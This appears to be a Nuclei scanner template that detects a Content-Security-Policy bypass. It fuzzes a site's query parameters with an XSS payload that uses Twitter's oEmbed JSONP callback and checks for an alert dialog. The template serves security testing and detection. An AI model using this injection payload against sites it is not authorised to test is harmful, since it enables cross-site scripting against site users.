id: twitter-api-csp-bypass
info:
name: Content-Security-Policy Bypass - Twitter API
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,twitter-api,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "twitter.com"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: twitter_api_csp_xss
args:
max-duration: 5s
payloads:
injection:
- '<script src="https://api.twitter.com/1/statuses/oembed.json?url=https:%2F%2Ftwitter.com%2FMartina%2Fstatus%2F867710263654580226&callback=alert&_=1496363308445"></script>'
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "twitter_api_csp_xss == true"
# digest: 4a0a00473045022100dfd64e6ab938750db04790aa73eacaeb7570972d575f74d418a2873b30a3e19002205c60ad14aa2bd6ff05967cbd9ea2ef5463e3866d127f3b0f49321df15c3041ea:922c64590222798bb761d5b6d8e72950